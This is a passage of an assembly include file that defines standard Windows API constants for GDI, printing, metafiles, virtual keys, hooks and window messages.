PHYSICALHEIGHT equ 111
PHYSICALOFFSETX equ 112
PHYSICALOFFSETY equ 113
SCALINGFACTORX equ 114
SCALINGFACTORY equ 115
DT_PLOTTER equ 0
DT_RASDISPLAY equ 1
DT_RASPRINTER equ 2
DT_RASCAMERA equ 3
DT_CHARSTREAM equ 4
DT_METAFILE equ 5
DT_DISPFILE equ 6
CC_NONE equ 0
CC_CIRCLES equ 1
CC_PIE equ 2
CC_CHORD equ 4
CC_ELLIPSES equ 8
CC_WIDE equ 16
CC_STYLED equ 32
CC_WIDESTYLED equ 64
CC_INTERIORS equ 128
CC_ROUNDRECT equ 256
LC_NONE equ 0
LC_POLYLINE equ 2
LC_MARKER equ 4
LC_POLYMARKER equ 8
LC_WIDE equ 16
LC_STYLED equ 32
LC_WIDESTYLED equ 64
LC_INTERIORS equ 128
PC_NONE equ 0
PC_POLYGON equ 1
PC_RECTANGLE equ 2
PC_WINDPOLYGON equ 4
PC_TRAPEZOID equ 4
PC_SCANLINE equ 8
PC_WIDE equ 16
PC_STYLED equ 32
PC_WIDESTYLED equ 64
PC_INTERIORS equ 128
CP_NONE equ 0
CP_RECTANGLE equ 1
CP_REGION equ 2
TC_OP_CHARACTER equ 1h
TC_OP_STROKE equ 2h
TC_CP_STROKE equ 4h
TC_CR_90 equ 8h
TC_CR_ANY equ 10h
TC_SF_X_YINDEP equ 20h
TC_SA_DOUBLE equ 40h
TC_SA_INTEGER equ 80h
TC_SA_CONTIN equ 100h
TC_EA_DOUBLE equ 200h
TC_IA_ABLE equ 400h
TC_UA_ABLE equ 800h
TC_SO_ABLE equ 1000h
TC_RA_ABLE equ 2000h
TC_VA_ABLE equ 4000h
TC_RESERVED equ 8000h
TC_SCROLLBLT equ 10000h
RC_NONE equ 0
RC_BITBLT equ 1
RC_BANDING equ 2
RC_SCALING equ 4
RC_BITMAP64 equ 8
RC_GDI20_OUTPUT equ 10h
RC_GDI20_STATE equ 20h
RC_SAVEBITMAP equ 40h
RC_DI_BITMAP equ 80h
RC_PALETTE equ 100h
RC_DIBTODEV equ 200h
RC_BIGFONT equ 400h
RC_STRETCHBLT equ 800h
RC_FLOODFILL equ 1000h
RC_STRETCHDIB equ 2000h
RC_OP_DX_OUTPUT equ 4000h
RC_DEVBITS equ 8000h
DIB_RGB_COLORS equ 0
DIB_PAL_COLORS equ 1
DIB_PAL_INDICES equ 2
DIB_PAL_PHYSINDICES equ 2
DIB_PAL_LOGINDICES equ 4
SYSPAL_ERROR equ 0
SYSPAL_STATIC equ 1
SYSPAL_NOSTATIC equ 2
CBM_CREATEDIB equ 2h
CBM_INIT equ 4h
FLOODFILLBORDER equ 0
FLOODFILLSURFACE equ 1
CCHDEVICENAME equ 32
CCHFORMNAME equ 32
DM_SPECVERSION equ 320h
DM_ORIENTATION equ 1h
DM_PAPERSIZE equ 2h
DM_PAPERLENGTH equ 4h
DM_PAPERWIDTH equ 8h
DM_SCALE equ 10h
DM_COPIES equ 100h
DM_DEFAULTSOURCE equ 200h
DM_PRINTQUALITY equ 400h
DM_COLOR equ 800h
DM_DUPLEX equ 1000h
DM_YRESOLUTION equ 2000h
DM_TTOPTION equ 4000h
DM_COLLATE equ 8000h
DM_FORMNAME equ 10000h
DMORIENT_PORTRAIT equ 1
DMORIENT_LANDSCAPE equ 2
DMPAPER_LETTER equ 1
DMPAPER_FIRST equ DMPAPER_LETTER
DMPAPER_LETTERSMALL equ 2
DMPAPER_TABLOID equ 3
DMPAPER_LEDGER equ 4
DMPAPER_LEGAL equ 5
DMPAPER_STATEMENT equ 6
DMPAPER_EXECUTIVE equ 7
DMPAPER_A3 equ 8
DMPAPER_A4 equ 9
DMPAPER_A4SMALL equ 10
DMPAPER_A5 equ 11
DMPAPER_B4 equ 12
DMPAPER_B5 equ 13
DMPAPER_FOLIO equ 14
DMPAPER_QUARTO equ 15
DMPAPER_10X14 equ 16
DMPAPER_11X17 equ 17
DMPAPER_NOTE equ 18
DMPAPER_ENV_9 equ 19
DMPAPER_ENV_10 equ 20
DMPAPER_ENV_11 equ 21
DMPAPER_ENV_12 equ 22
DMPAPER_ENV_14 equ 23
DMPAPER_CSHEET equ 24
DMPAPER_DSHEET equ 25
DMPAPER_ESHEET equ 26
DMPAPER_ENV_DL equ 27
DMPAPER_ENV_C5 equ 28
DMPAPER_ENV_C3 equ 29
DMPAPER_ENV_C4 equ 30
DMPAPER_ENV_C6 equ 31
DMPAPER_ENV_C65 equ 32
DMPAPER_ENV_B4 equ 33
DMPAPER_ENV_B5 equ 34
DMPAPER_ENV_B6 equ 35
DMPAPER_ENV_ITALY equ 36
DMPAPER_ENV_MONARCH equ 37
DMPAPER_ENV_PERSONAL equ 38
DMPAPER_FANFOLD_US equ 39
DMPAPER_FANFOLD_STD_GERMAN equ 40
DMPAPER_FANFOLD_LGL_GERMAN equ 41
DMPAPER_LAST equ DMPAPER_FANFOLD_LGL_GERMAN
DMPAPER_USER equ 256
DMBIN_UPPER equ 1
DMBIN_FIRST equ DMBIN_UPPER
DMBIN_ONLYONE equ 1
DMBIN_LOWER equ 2
DMBIN_MIDDLE equ 3
DMBIN_MANUAL equ 4
DMBIN_ENVELOPE equ 5
DMBIN_ENVMANUAL equ 6
DMBIN_AUTO equ 7
DMBIN_TRACTOR equ 8
DMBIN_SMALLFMT equ 9
DMBIN_LARGEFMT equ 10
DMBIN_LARGECAPACITY equ 11
DMBIN_CASSETTE equ 14
DMBIN_LAST equ DMBIN_CASSETTE
DMBIN_USER equ 256
DMRES_DRAFT equ -1
DMRES_LOW equ -2
DMRES_MEDIUM equ -3
DMRES_HIGH equ -4
DMCOLOR_MONOCHROME equ 1
DMCOLOR_COLOR equ 2
DMDUP_SIMPLEX equ 1
DMDUP_VERTICAL equ 2
DMDUP_HORIZONTAL equ 3
DMTT_BITMAP equ 1
DMTT_DOWNLOAD equ 2
DMTT_SUBDEV equ 3
DMCOLLATE_FALSE equ 0
DMCOLLATE_TRUE equ 1
DM_GRAYSCALE equ 1h
DM_INTERLACED equ 2h
RDH_RECTANGLES equ 1
GGO_METRICS equ 0
GGO_BITMAP equ 1
GGO_NATIVE equ 2
TT_POLYGON_TYPE equ 24
TT_PRIM_LINE equ 1
TT_PRIM_QSPLINE equ 2
TT_AVAILABLE equ 1h
TT_ENABLED equ 2h
DM_UPDATE equ 1
DM_COPY equ 2
DM_PROMPT equ 4
DM_MODIFY equ 8
DM_IN_BUFFER equ DM_MODIFY
DM_IN_PROMPT equ DM_PROMPT
DM_OUT_BUFFER equ DM_COPY
DM_OUT_DEFAULT equ DM_UPDATE
DC_FIELDS equ 1
DC_PAPERS equ 2
DC_PAPERSIZE equ 3
DC_MINEXTENT equ 4
DC_MAXEXTENT equ 5
DC_BINS equ 6
DC_DUPLEX equ 7
DC_SIZE equ 8
DC_EXTRA equ 9
DC_VERSION equ 10
DC_DRIVER equ 11
DC_BINNAMES equ 12
DC_ENUMRESOLUTIONS equ 13
DC_FILEDEPENDENCIES equ 14
DC_TRUETYPE equ 15
DC_PAPERNAMES equ 16
DC_ORIENTATION equ 17
DC_COPIES equ 18
DCTT_BITMAP equ 1h
DCTT_DOWNLOAD equ 2h
DCTT_SUBDEV equ 4h
CA_NEGATIVE equ 1h
CA_LOG_FILTER equ 2h
ILLUMINANT_DEVICE_DEFAULT equ 0
ILLUMINANT_A equ 1
ILLUMINANT_B equ 2
ILLUMINANT_C equ 3
ILLUMINANT_D50 equ 4
ILLUMINANT_D55 equ 5
ILLUMINANT_D65 equ 6
ILLUMINANT_D75 equ 7
ILLUMINANT_F2 equ 8
ILLUMINANT_MAX_INDEX equ ILLUMINANT_F2
ILLUMINANT_TUNGSTEN equ ILLUMINANT_A
ILLUMINANT_DAYLIGHT equ ILLUMINANT_C
ILLUMINANT_FLUORESCENT equ ILLUMINANT_F2
ILLUMINANT_NTSC equ ILLUMINANT_C
RGB_GAMMA_MIN equ 2500
RGB_GAMMA_MAX equ 65000
REFERENCE_WHITE_MIN equ 6000
REFERENCE_WHITE_MAX equ 10000
REFERENCE_BLACK_MIN equ 0
REFERENCE_BLACK_MAX equ 4000
COLOR_ADJ_MIN equ -100
COLOR_ADJ_MAX equ 100
FONTMAPPER_MAX equ 10
ENHMETA_SIGNATURE equ 464D4520h
ENHMETA_STOCK_OBJECT equ 80000000h
EMR_HEADER equ 1
EMR_POLYBEZIER equ 2
EMR_POLYGON equ 3
EMR_POLYLINE equ 4
EMR_POLYBEZIERTO equ 5
EMR_POLYLINETO equ 6
EMR_POLYPOLYLINE equ 7
EMR_POLYPOLYGON equ 8
EMR_SETWINDOWEXTEX equ 9
EMR_SETWINDOWORGEX equ 10
EMR_SETVIEWPORTEXTEX equ 11
EMR_SETVIEWPORTORGEX equ 12
EMR_SETBRUSHORGEX equ 13
EMR_EOF equ 14
EMR_SETPIXELV equ 15
EMR_SETMAPPERFLAGS equ 16
EMR_SETMAPMODE equ 17
EMR_SETBKMODE equ 18
EMR_SETPOLYFILLMODE equ 19
EMR_SETROP2 equ 20
EMR_SETSTRETCHBLTMODE equ 21
EMR_SETTEXTALIGN equ 22
EMR_SETCOLORADJUSTMENT equ 23
EMR_SETTEXTCOLOR equ 24
EMR_SETBKCOLOR equ 25
EMR_OFFSETCLIPRGN equ 26
EMR_MOVETOEX equ 27
EMR_SETMETARGN equ 28
EMR_EXCLUDECLIPRECT equ 29
EMR_INTERSECTCLIPRECT equ 30
EMR_SCALEVIEWPORTEXTEX equ 31
EMR_SCALEWINDOWEXTEX equ 32
EMR_SAVEDC equ 33
EMR_RESTOREDC equ 34
EMR_SETWORLDTRANSFORM equ 35
EMR_MODIFYWORLDTRANSFORM equ 36
EMR_SELECTOBJECT equ 37
EMR_CREATEPEN equ 38
EMR_CREATEBRUSHINDIRECT equ 39
EMR_DELETEOBJECT equ 40
EMR_ANGLEARC equ 41
EMR_ELLIPSE equ 42
EMR_RECTANGLE equ 43
EMR_ROUNDRECT equ 44
EMR_ARC equ 45
EMR_CHORD equ 46
EMR_PIE equ 47
EMR_SELECTPALETTE equ 48
EMR_CREATEPALETTE equ 49
EMR_SETPALETTEENTRIES equ 50
EMR_RESIZEPALETTE equ 51
EMR_REALIZEPALETTE equ 52
EMR_EXTFLOODFILL equ 53
EMR_LINETO equ 54
EMR_ARCTO equ 55
EMR_POLYDRAW equ 56
EMR_SETARCDIRECTION equ 57
EMR_SETMITERLIMIT equ 58
EMR_BEGINPATH equ 59
EMR_ENDPATH equ 60
EMR_CLOSEFIGURE equ 61
EMR_FILLPATH equ 62
EMR_STROKEANDFILLPATH equ 63
EMR_STROKEPATH equ 64
EMR_FLATTENPATH equ 65
EMR_WIDENPATH equ 66
EMR_SELECTCLIPPATH equ 67
EMR_ABORTPATH equ 68
EMR_GDICOMMENT equ 70
EMR_FILLRGN equ 71
EMR_FRAMERGN equ 72
EMR_INVERTRGN equ 73
EMR_PAINTRGN equ 74
EMR_EXTSELECTCLIPRGN equ 75
EMR_BITBLT equ 76
EMR_STRETCHBLT equ 77
EMR_MASKBLT equ 78
EMR_PLGBLT equ 79
EMR_SETDIBITSTODEVICE equ 80
EMR_STRETCHDIBITS equ 81
EMR_EXTCREATEFONTINDIRECTW equ 82
EMR_EXTTEXTOUTA equ 83
EMR_EXTTEXTOUTW equ 84
EMR_POLYBEZIER16 equ 85
EMR_POLYGON16 equ 86
EMR_POLYLINE16 equ 87
EMR_POLYBEZIERTO16 equ 88
EMR_POLYLINETO16 equ 89
EMR_POLYPOLYLINE16 equ 90
EMR_POLYPOLYGON16 equ 91
EMR_POLYDRAW16 equ 92
EMR_CREATEMONOBRUSH equ 93
EMR_CREATEDIBPATTERNBRUSHPT equ 94
EMR_EXTCREATEPEN equ 95
EMR_POLYTEXTOUTA equ 96
EMR_POLYTEXTOUTW equ 97
EMR_MIN equ 1
EMR_MAX equ 97
STRETCH_ANDSCANS equ 1
STRETCH_ORSCANS equ 2
STRETCH_DELETESCANS equ 3
STRETCH_HALFTONE equ 4
TCI_SRCCHARSET equ 1
TCI_SRCCODEPAGE equ 2
TCI_SRCFONTSIG equ 3
MONO_FONT equ 8
JOHAB_CHARSET equ 130
HEBREW_CHARSET equ 177
ARABIC_CHARSET equ 178
GREEK_CHARSET equ 161
TURKISH_CHARSET equ 162
THAI_CHARSET equ 222
EASTEUROPE_CHARSET equ 238
RUSSIAN_CHARSET equ 204
MAC_CHARSET equ 77
BALTIC_CHARSET equ 186
FS_LATIN1 equ 1h
FS_LATIN2 equ 2h
FS_CYRILLIC equ 4h
FS_GREEK equ 8h
FS_TURKISH equ 10h
FS_HEBREW equ 20h
FS_ARABIC equ 40h
FS_BALTIC equ 80h
FS_THAI equ 10000h
FS_JISJAPAN equ 20000h
FS_CHINESESIMP equ 40000h
FS_WANSUNG equ 80000h
FS_CHINESETRAD equ 100000h
FS_JOHAB equ 200000h
FS_SYMBOL equ 80000000h
DEFAULT_GUI_FONT equ 17
DM_RESERVED1 equ 800000h
DM_RESERVED2 equ 1000000h
DM_ICMMETHOD equ 2000000h
DM_ICMINTENT equ 4000000h
DM_MEDIATYPE equ 8000000h
DM_DITHERTYPE equ 10000000h
DMPAPER_ISO_B4 equ 42
DMPAPER_JAPANESE_POSTCARD equ 43
DMPAPER_9X11 equ 44
DMPAPER_10X11 equ 45
DMPAPER_15X11 equ 46
DMPAPER_ENV_INVITE equ 47
DMPAPER_RESERVED_48 equ 48
DMPAPER_RESERVED_49 equ 49
DMPAPER_LETTER_EXTRA equ 50
DMPAPER_LEGAL_EXTRA equ 51
DMPAPER_TABLOID_EXTRA equ 52
DMPAPER_A4_EXTRA equ 53
DMPAPER_LETTER_TRANSVERSE equ 54
DMPAPER_A4_TRANSVERSE equ 55
DMPAPER_LETTER_EXTRA_TRANSVERSE equ 56
DMPAPER_A_PLUS equ 57
DMPAPER_B_PLUS equ 58
DMPAPER_LETTER_PLUS equ 59
DMPAPER_A4_PLUS equ 60
DMPAPER_A5_TRANSVERSE equ 61
DMPAPER_B5_TRANSVERSE equ 62
DMPAPER_A3_EXTRA equ 63
DMPAPER_A5_EXTRA equ 64
DMPAPER_B5_EXTRA equ 65
DMPAPER_A2 equ 66
DMPAPER_A3_TRANSVERSE equ 67
DMPAPER_A3_EXTRA_TRANSVERSE equ 68
DMTT_DOWNLOAD_OUTLINE equ 4
DMICMMETHOD_NONE equ 1
DMICMMETHOD_SYSTEM equ 2
DMICMMETHOD_DRIVER equ 3
DMICMMETHOD_DEVICE equ 4
DMICMMETHOD_USER equ 256
DMICM_SATURATE equ 1
DMICM_CONTRAST equ 2
DMICM_COLORMETRIC equ 3
DMICM_USER equ 256
DMMEDIA_STANDARD equ 1
DMMEDIA_GLOSSY equ 2
DMMEDIA_TRANSPARENCY equ 3
DMMEDIA_USER equ 256
DMDITHER_NONE equ 1
DMDITHER_COARSE equ 2
DMDITHER_FINE equ 3
DMDITHER_LINEART equ 4
DMDITHER_GRAYSCALE equ 5
DMDITHER_USER equ 256
GGO_GRAY2_BITMAP equ 4
GGO_GRAY4_BITMAP equ 5
GGO_GRAY8_BITMAP equ 6
GGO_GLYPH_INDEX equ 80h
GCP_DBCS equ 1h
GCP_REORDER equ 2h
GCP_USEKERNING equ 8h
GCP_GLYPHSHAPE equ 10h
GCP_LIGATE equ 20h
GCP_DIACRITIC equ 100h
GCP_KASHIDA equ 400h
GCP_ERROR equ 8000h
FLI_MASK equ 103Bh
GCP_JUSTIFY equ 10000h
GCP_NODIACRITICS equ 20000h
FLI_GLYPHS equ 40000h
GCP_CLASSIN equ 80000h
GCP_MAXEXTENT equ 100000h
GCP_JUSTIFYIN equ 200000h
GCP_DISPLAYZWG equ 400000h
GCP_SYMSWAPOFF equ 800000h
GCP_NUMERICOVERRIDE equ 1000000h
GCP_NEUTRALOVERRIDE equ 2000000h
GCP_NUMERICSLATIN equ 4000000h
GCP_NUMERICSLOCAL equ 8000000h
GCPCLASS_LATIN equ 1
GCPCLASS_HEBREW equ 2
GCPCLASS_ARABIC equ 2
GCPCLASS_NEUTRAL equ 3
GCPCLASS_LOCALNUMBER equ 4
GCPCLASS_LATINNUMBER equ 5
GCPCLASS_LATINNUMERICTERMINATOR equ 6
GCPCLASS_LATINNUMERICSEPARATOR equ 7
GCPCLASS_NUMERICSEPARATOR equ 8
GCPCLASS_PREBOUNDRTL equ 80h
GCPCLASS_PREBOUNDLTR equ 40h
DC_BINADJUST equ 19
DC_EMF_COMPLIANT equ 20
DC_DATATYPE_PRODUCED equ 21
DC_COLLATE equ 22
DCTT_DOWNLOAD_OUTLINE equ 8h
DCBA_FACEUPNONE equ 0h
DCBA_FACEUPCENTER equ 1h
DCBA_FACEUPLEFT equ 2h
DCBA_FACEUPRIGHT equ 3h
DCBA_FACEDOWNNONE equ 100h
DCBA_FACEDOWNCENTER equ 101h
DCBA_FACEDOWNLEFT equ 102h
DCBA_FACEDOWNRIGHT equ 103h
ICM_OFF equ 1
ICM_ON equ 2
ICM_QUERY equ 3
EMR_SETICMMODE equ 98
EMR_CREATECOLORSPACE equ 99
EMR_SETCOLORSPACE equ 100
EMR_DELETECOLORSPACE equ 101
SB_HORZ equ 0
SB_VERT equ 1
SB_CTL equ 2
SB_BOTH equ 3
SB_LINEUP equ 0
SB_LINELEFT equ 0
SB_LINEDOWN equ 1
SB_LINERIGHT equ 1
SB_PAGEUP equ 2
SB_PAGELEFT equ 2
SB_PAGEDOWN equ 3
SB_PAGERIGHT equ 3
SB_THUMBPOSITION equ 4
SB_THUMBTRACK equ 5
SB_TOP equ 6
SB_LEFT equ 6
SB_BOTTOM equ 7
SB_RIGHT equ 7
SB_ENDSCROLL equ 8
SBM_SETSCROLLINFO equ 00E9h
SBM_GETSCROLLINFO equ 00EAh
SIF_RANGE equ 0001h
SIF_PAGE equ 0002h
SIF_POS equ 0004h
SIF_DISABLENOSCROLL equ 0008h
SIF_TRACKPOS equ 0010h
SIF_ALL equ SIF_RANGE|SIF_PAGE|SIF_POS|SIF_TRACKPOS
SW_HIDE equ 0
SW_SHOWNORMAL equ 1
SW_NORMAL equ 1
SW_SHOWMINIMIZED equ 2
SW_SHOWMAXIMIZED equ 3
SW_MAXIMIZE equ 3
SW_SHOWNOACTIVATE equ 4
SW_SHOW equ 5
SW_MINIMIZE equ 6
SW_SHOWMINNOACTIVE equ 7
SW_SHOWNA equ 8
SW_RESTORE equ 9
SW_SHOWDEFAULT equ 10
SW_MAX equ 10
HIDE_WINDOW equ 0
SHOW_OPENWINDOW equ 1
SHOW_ICONWINDOW equ 2
SHOW_FULLSCREEN equ 3
SHOW_OPENNOACTIVATE equ 4
SW_PARENTCLOSING equ 1
SW_OTHERZOOM equ 2
SW_PARENTOPENING equ 3
SW_OTHERUNZOOM equ 4
KF_EXTENDED equ 100h
KF_DLGMODE equ 800h
KF_MENUMODE equ 1000h
KF_ALTDOWN equ 2000h
KF_REPEAT equ 4000h
KF_UP equ 8000h
VK_BACK equ 8h
VK_CANCEL equ 3h
VK_CAPITAL equ 14h
VK_CLEAR equ 0Ch
VK_CONTROL equ 11h
VK_DELETE equ 2Eh
VK_DOWN equ 28h
VK_END equ 23h
VK_ESCAPE equ 1Bh
VK_EXECUTE equ 2Bh
VK_HELP equ 2Fh
VK_HOME equ 24h
VK_INSERT equ 2Dh
VK_LBUTTON equ 1h
VK_LEFT equ 25h
VK_MBUTTON equ 4h
VK_MENU equ 12h
VK_NEXT equ 22h
VK_PAUSE equ 13h
VK_PGDN equ 22h
VK_PGUP equ 21h
VK_PRINT equ 2Ah
VK_PRIOR equ 21h
VK_RBUTTON equ 2h
VK_RETURN equ 0Dh
VK_RIGHT equ 27h
VK_SELECT equ 29h
VK_SHIFT equ 10h
VK_SNAPSHOT equ 2Ch
VK_SPACE equ 20h
VK_TAB equ 9h
VK_UP equ 26h
VK_NUMPAD0 equ 60h
VK_NUMPAD1 equ 61h
VK_NUMPAD2 equ 62h
VK_NUMPAD3 equ 63h
VK_NUMPAD4 equ 64h
VK_NUMPAD5 equ 65h
VK_NUMPAD6 equ 66h
VK_NUMPAD7 equ 67h
VK_NUMPAD8 equ 68h
VK_NUMPAD9 equ 69h
VK_MULTIPLY equ 6Ah
VK_ADD equ 6Bh
VK_SEPARATOR equ 6Ch
VK_SUBTRACT equ 6Dh
VK_DECIMAL equ 6Eh
VK_DIVIDE equ 6Fh
VK_F1 equ 70h
VK_F2 equ 71h
VK_F3 equ 72h
VK_F4 equ 73h
VK_F5 equ 74h
VK_F6 equ 75h
VK_F7 equ 76h
VK_F8 equ 77h
VK_F9 equ 78h
VK_F10 equ 79h
VK_F11 equ 7Ah
VK_F12 equ 7Bh
VK_F13 equ 7Ch
VK_F14 equ 7Dh
VK_F15 equ 7Eh
VK_F16 equ 7Fh
VK_F17 equ 80h
VK_F18 equ 81h
VK_F19 equ 82h
VK_F20 equ 83h
VK_F21 equ 84h
VK_F22 equ 85h
VK_F23 equ 86h
VK_F24 equ 87h
VK_NUMLOCK equ 90h
VK_SCROLL equ 91h
VK_LSHIFT equ 0A0h
VK_RSHIFT equ 0A1h
VK_LCONTROL equ 0A2h
VK_RCONTROL equ 0A3h
VK_LMENU equ 0A4h
VK_RMENU equ 0A5h
VK_ATTN equ 0F6h
VK_CRSEL equ 0F7h
VK_EXSEL equ 0F8h
VK_EREOF equ 0F9h
VK_PLAY equ 0FAh
VK_ZOOM equ 0FBh
VK_NONAME equ 0FCh
VK_PA1 equ 0FDh
VK_OEM_CLEAR equ 0FEh
WH_MIN equ -1
WH_MSGFILTER equ -1
WH_JOURNALRECORD equ 0
WH_JOURNALPLAYBACK equ 1
WH_KEYBOARD equ 2
WH_GETMESSAGE equ 3
WH_CALLWNDPROC equ 4
WH_CBT equ 5
WH_SYSMSGFILTER equ 6
WH_MOUSE equ 7
WH_HARDWARE equ 8
WH_DEBUG equ 9
WH_SHELL equ 10
WH_FOREGROUNDIDLE equ 11
WH_MAX equ 11
HC_ACTION equ 0
HC_GETNEXT equ 1
HC_SKIP equ 2
HC_NOREMOVE equ 3
HC_NOREM equ HC_NOREMOVE
HC_SYSMODALON equ 4
HC_SYSMODALOFF equ 5
HCBT_MOVESIZE equ 0
HCBT_MINMAX equ 1
HCBT_QS equ 2
HCBT_CREATEWND equ 3
HCBT_DESTROYWND equ 4
HCBT_ACTIVATE equ 5
HCBT_CLICKSKIPPED equ 6
HCBT_KEYSKIPPED equ 7
HCBT_SYSCOMMAND equ 8
HCBT_SETFOCUS equ 9
HSHELL_WINDOWCREATED equ 1
HSHELL_WINDOWDESTROYED equ 2
HSHELL_ACTIVATESHELLWINDOW equ 3
HKL_PREV equ 0
HKL_NEXT equ 1
KLF_ACTIVATE equ 1h
KLF_SUBSTITUTE_OK equ 2h
KLF_UNLOADPREVIOUS equ 4h
KLF_REORDER equ 8h
KL_NAMELENGTH equ 9
DESKTOP_READOBJECTS equ 1h
DESKTOP_CREATEWINDOW equ 2h
DESKTOP_CREATEMENU equ 4h
DESKTOP_HOOKCONTROL equ 8h
DESKTOP_JOURNALRECORD equ 10h
DESKTOP_JOURNALPLAYBACK equ 20h
DESKTOP_ENUMERATE equ 40h
DESKTOP_WRITEOBJECTS equ 80h
WINSTA_ENUMDESKTOPS equ 1h
WINSTA_READATTRIBUTES equ 2h
WINSTA_ACCESSCLIPBOARD equ 4h
WINSTA_CREATEDESKTOP equ 8h
WINSTA_WRITEATTRIBUTES equ 10h
WINSTA_ACCESSPUBLICATOMS equ 20h
WINSTA_EXITWINDOWS equ 40h
WINSTA_ENUMERATE equ 100h
WINSTA_READSCREEN equ 200h
GWL_WNDPROC equ -4
GWL_HINSTANCE equ -6
GWL_HWNDPARENT equ -8
GWL_STYLE equ -16
GWL_EXSTYLE equ -20
GWL_USERDATA equ -21
GWL_ID equ -12
GCL_MENUNAME equ -8
GCL_HBRBACKGROUND equ -10
GCL_HCURSOR equ -12
GCL_HICON equ -14
GCL_HMODULE equ -16
GCL_CBWNDEXTRA equ -18
GCL_CBCLSEXTRA equ -20
GCL_WNDPROC equ -24
GCL_STYLE equ -26
GCW_ATOM equ -32
WM_USER equ 400h
WM_NULL equ 0h
WM_CREATE equ 1h
WM_DESTROY equ 2h
WM_MOVE equ 3h
WM_SIZE equ 5h
WM_ACTIVATE equ 6h
WA_INACTIVE equ 0
WA_ACTIVE equ 1
WA_CLICKACTIVE equ 2
WM_SETFOCUS equ 7h
WM_KILLFOCUS equ 08h
WM_ENABLE equ 0Ah
WM_SETREDRAW equ 0Bh
WM_SETTEXT equ 0Ch
WM_GETTEXT equ 0Dh
WM_GETTEXTLENGTH equ 0Eh
WM_PAINT equ 0Fh
WM_CLOSE equ 10h
WM_QUERYENDSESSION equ 11h
WM_QUIT equ 12h
WM_QUERYOPEN equ 13h
WM_ERASEBKGND equ 14h
WM_SYSCOLORCHANGE equ 15h
WM_ENDSESSION equ 16h
WM_SHOWWINDOW equ 18h
WM_WININICHANGE equ 1Ah
WM_DEVMODECHANGE equ 1Bh
WM_ACTIVATEAPP equ 1Ch
WM_FONTCHANGE equ 1Dh
WM_TIMECHANGE equ 1Eh
WM_CANCELMODE equ 1Fh
WM_SETCURSOR equ 20h
WM_MOUSEACTIVATE equ 21h
WM_CHILDACTIVATE equ 22h
WM_QUEUESYNC equ 23h
WM_GETMINMAXINFO equ 24h
WM_PAINTICON equ 26h
WM_ICONERASEBKGND equ 27h
WM_NEXTDLGCTL equ 28h
WM_SPOOLERSTATUS equ 2Ah
WM_DRAWITEM equ 2Bh
WM_MEASUREITEM equ 2Ch
WM_DELETEITEM equ 2Dh
WM_VKEYTOITEM equ 2Eh
WM_CHARTOITEM equ 2Fh
WM_SETFONT equ 30h
WM_GETFONT equ 31h
WM_SETHOTKEY equ 32h
WM_GETHOTKEY equ 33h
WM_QUERYDRAGICON equ 37h
WM_COMPAREITEM equ 39h
WM_COMPACTING equ 41h
WM_OTHERWINDOWCREATED equ 42h
WM_OTHERWINDOWDESTROYED equ 43h
WM_COMMNOTIFY equ 44h
CN_RECEIVE equ 1h
CN_TRANSMIT equ 2h
CN_EVENT equ 4h
WM_WINDOWPOSCHANGING equ 46h
WM_WINDOWPOSCHANGED equ 47h
WM_POWER equ 48h
PWR_OK equ 1
PWR_FAIL equ -1
PWR_SUSPENDREQUEST equ 1
PWR_SUSPENDRESUME equ 2
PWR_CRITICALRESUME equ 3
WM_COPYDATA equ 4Ah
WM_CANCELJOURNAL equ 4Bh
WM_NOTIFY equ 4Eh
WM_INPUTLANGUAGECHANGEREQUEST equ 50h
WM_INPUTLANGUAGECHANGE equ 51h
WM_TCARD equ 52h
WM_HELP equ 53h
WM_USERCHANGED equ 54h
WM_NOTIFYFORMAT equ 55h
WM_CONTEXTMENU equ 7Bh
WM_STYLECHANGING equ 7Ch
WM_STYLECHANGED equ 7Dh
WM_DISPLAYCHANGE equ 7Eh
WM_GETICON equ 7Fh
WM_SETICON equ 80h
WM_NCCREATE equ 81h
WM_NCDESTROY equ 82h
WM_NCCALCSIZE equ 83h
WM_NCHITTEST equ 84h
WM_NCPAINT equ 85h
WM_NCACTIVATE equ 86h
WM_GETDLGCODE equ 87h
WM_NCMOUSEMOVE equ 0A0h
WM_NCLBUTTONDOWN equ 0A1h
WM_NCLBUTTONUP equ 0A2h
WM_NCLBUTTONDBLCLK equ 0A3h
WM_NCRBUTTONDOWN equ 0A4h
WM_NCRBUTTONUP equ 0A5h
WM_NCRBUTTONDBLCLK equ 0A6h
WM_NCMBUTTONDOWN equ 0A7h
WM_NCMBUTTONUP equ 0A8h
WM_NCMBUTTONDBLCLK equ 0A9h
WM_KEYFIRST equ 100h
WM_KEYDOWN equ 100h
WM_KEYUP equ 101h
WM_CHAR equ 102h
WM_DEADCHAR equ 103h
WM_SYSKEYDOWN equ 104h
WM_SYSKEYUP equ 105h
WM_SYSCHAR equ 106h
WM_SYSDEADCHAR equ 107h
WM_KEYLAST equ 108h
WM_INITDIALOG equ 110h
WM_COMMAND equ 111h
WM_SYSCOMMAND equ 112h
WM_TIMER equ 113h
WM_HSCROLL equ 114h
WM_VSCROLL equ 115h
WM_INITMENU equ 116h
WM_INITMENUPOPUP equ 117h
WM_MENUSELECT equ 11Fh
WM_MENUCHAR equ 120h
WM_ENTERIDLE equ 121h
WM_CTLCOLORMSGBOX equ 132h
WM_CTLCOLOREDIT equ 133h
WM_CTLCOLORLISTBOX equ 134h
WM_CTLCOLORBTN equ 135h
WM_CTLCOLORDLG equ 136h
WM_CTLCOLORSCROLLBAR equ 137h
WM_CTLCOLORSTATIC equ 138h
WM_MOUSEFIRST equ 200h
WM_MOUSEMOVE equ 200h
WM_LBUTTONDOWN equ 201h
WM_LBUTTONUP equ 202h
WM_LBUTTONDBLCLK equ 203h
WM_RBUTTONDOWN equ 204h
WM_RBUTTONUP equ 205h
WM_RBUTTONDBLCLK equ 206h
WM_MBUTTONDOWN equ 207h
WM_MBUTTONUP equ 208h
WM_MBUTTONDBLCLK equ 209h
WM_MOUSELAST equ 209h
WM_PARENTNOTIFY equ 210h
WM_ENTERMENULOOP equ 211h
WM_EXITMENULOOP equ 212h
WM_MDICREATE equ 220h
WM_MDIDESTROY equ 221h
WM_MDIACTIVATE equ 222h
WM_MDIRESTORE equ 223h
WM_MDINEXT equ 224h
WM_MDIMAXIMIZE equ 225h
WM_MDITILE equ 226h
WM_MDICASCADE equ 227h
WM_MDIICONARRANGE equ 228h
WM_MDIGETACTIVE equ 229h
WM_MDISETMENU equ 230h
WM_DROPFILES equ 233h
WM_MDIREFRESHMENU equ 234h
WM_CUT equ 300h
WM_COPY equ 301h
WM_PASTE equ 302h
WM_CLEAR equ 303h
WM_UNDO equ 304h
WM_RENDERFORMAT equ 305h
WM_RENDERALLFORMATS equ 306h
